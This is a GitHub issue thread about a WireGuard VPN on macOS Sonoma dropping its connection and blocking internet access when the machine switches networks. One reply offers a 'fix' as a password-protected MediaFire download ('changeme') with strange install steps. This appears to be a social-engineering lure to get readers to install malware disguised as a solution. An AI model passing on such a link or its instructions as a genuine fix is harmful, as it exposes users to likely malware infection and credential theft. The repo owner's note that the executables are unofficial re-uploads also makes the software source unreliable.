### ISSUE TITLE
Wireguard VPN disconnects on network switches

### ISSUE THREAD

**Issue by Harry3co** [zakosaba/wireguard-macos-app#4]
Hey

I couldn't find any other way the report this issue or find any solutions to this.

We configured wireguard on our macos devices, Sonoma OS. We're using a launchd job to to start up the wireguard vpn automatically after the device's starting up. 
Somehow the devices are losing its vpn connection when switching networks though. For example, having the device on a docking station on LAN and unplug it, where the device switches into Wifi the VPN connection disconnects and even blocks internet access completely. So far i could not find anything to this issue how to solve it except restarting the device or manually shut down the wireguard vpn by wg-quick down and start it up again, which is not a sustainable solution unfortunenately.

So i hope on some similiar expiriences or even help on this one.

Thanks for taking time and any advice.

Regards

Harry

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by vaardan** [comment]
Hi, I just re-uploaded the executables, because I couldn't find them anywhere else. But I'm not affiliated with the original devs, so you should probably address issue in the original repo:
https://github.com/WireGuard/wireguard-apple
